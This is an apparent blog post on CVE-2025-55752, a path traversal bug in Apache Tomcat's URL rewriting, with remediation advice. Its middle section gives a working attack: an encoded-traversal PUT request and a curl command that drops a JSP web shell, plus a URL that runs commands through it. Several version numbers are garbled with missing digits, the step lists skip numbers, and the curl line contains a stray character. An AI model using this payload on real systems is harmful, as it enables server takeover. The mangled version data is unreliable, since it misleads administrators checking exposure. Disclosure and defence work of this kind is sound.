CVE CyberSecurity Database News

CVE-2025-55752 - Apache Tomcat Relative Path Traversal Vulnerability – Exploit, Impact, and Practical Guidance

Poster -

A dangerous new security hole—CVE-2025-55752—has been discovered in Apache Tomcat, one of the world’s most popular Java application servers. This vulnerability opens the door for attackers to bypass core security checks and, under the right conditions, write malicious files to sensitive server locations, potentially leading to full remote code execution.

In this post, we’ll walk through what happened, demonstrate the bug, and show you how to check if you’re vulnerable. We’ve kept the language as simple and direct as possible for everyone to understand, from admins to curious developers.

What is CVE-2025-55752?

CVE-2025-55752 is a relative path traversal vulnerability in Tomcat’s URL rewrite handling, introduced as an unintended side effect of the fix for bug 60013.

Because of how Tomcat now normalizes the rewritten URL before decoding it, attackers can sneak encoded traversal sequences past Tomcat’s built-in protections and manipulate which files the server accesses or writes. This becomes particularly dangerous when HTTP PUT is enabled, letting an attacker upload files anywhere they want in certain directory structures.

Plus older EOL versions: 8.5.6 through 8.5.100

Safe Versions:
Upgrade to: 11..11, 10.1.45, or 9..109+
Official Tomcat Security Advisory

How the Exploit Works

Tomcat protects critical directories like /WEB-INF/ and /META-INF/ by default. These folders aren't supposed to be accessible from outside the server.

Previously, if a user tried to access something like
GET /WEB-INF/web.xml, Tomcat would block the request.

But because of this bug, if you manipulate the URL in a special way (using encoded paths—e.g., %2e%2e/ for ../—and rewrite rules that move query parameters to the URI), Tomcat first simplifies the path, then decodes it. This sequence lets the traversal slip past the security checks.

Suppose you have a Tomcat server with the following rewrite rule (using mod_rewrite or similar)

<!-- Example rewrite: moves ?file=target to /downloads/target -->
RewriteCond %{QUERY_STRING} file=(.+)
RewriteRule ^/download /downloads/%1 [QSA,L]

Now, let's say PUT is enabled for trusted users, but an attacker finds a way to send

PUT /download?file=..%2f..%2fWEB-INF%2fweb.xml HTTP/1.1
Host: target-app
Content-Length: 16

malicious content

Because of the bug:
1. Tomcat's URL rewriting moves the query param into the path: /downloads/..%2f..%2fWEB-INF%2fweb.xml.

Tomcat *normalizes* the path, thinking it's safe.

3. Then, it decodes the %2f to /, resulting in /downloads/../../WEB-INF/web.xml.
4. That path is resolved as /WEB-INF/web.xml, and Tomcat misses the chance to block it.

The malicious content is uploaded directly into this protected location.

In effect, this means an attacker can overwrite or upload files anywhere the Tomcat process has write permission!

Code Snippet: Minimal Proof of Concept

Below is a sample exploit script using curl to exploit the flaw by writing a web shell to a protected directory (assuming all the right misconfigurations):

curl -X PUT "http://victim.com/download?file=..%2f..%2fwebapps%2fROOT%2fshell.jsp"; \
     -d '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>' \
     -H "Content-Type: application/octet-stream"

If /download is rewritten to /downloads/<value> as above, this request drops a simple web shell at /webapps/ROOT/shell.jsp!

You (or an attacker) can now run commands by visiting

http://victim.com/shell.jsp?cmd=whoami

Disclaimer: Only test on systems you own!
Enabling PUT is rare, but if it’s on and you use rewrite rules that manipulate URIs, you’re in big trouble!

How to Check if You're Vulnerable

1. Are you running Tomcat 9...M11 through 9..108, 10.1.-M1 through 10.1.44, or 11..-M1 through 11..10?

Is PUT enabled (even for a single endpoint)?

4. Did you ever restrict access to /WEB-INF/, /META-INF/, or other secret directories by relying solely on Tomcat’s built-in checks?

If YES to any, you may be at risk. Try audit logs for odd PUT requests and test the exploit in your staging.

- Tomcat Security CVEs
- Bug 60013 - Original Regression
- Tomcat Changelog
- Relative Path Traversal (OWASP)

How to Fix

Upgrade Tomcat.

Audit and harden rewrite rules.

- Block access to /WEB-INF/ and /META-INF/ at the web server/proxy layer with strict rules.

Summary

CVE-2025-55752 is a prime example of how small issues in request handling can create major risk. Tomcat users, especially those with custom rewrite rules, must patch immediately or risk serious compromise.

Check your versions, inspect your endpoints, and upgrade today.

*This write-up is exclusive—please share responsibly and patch your servers!*

For any questions or deeper technical details, visit the official Apache Tomcat security page. Stay safe!

Timeline

Published on: 10/27/2025 18:15:42 UTC
Last modified on: 11/14/2025 17:44:41 UTC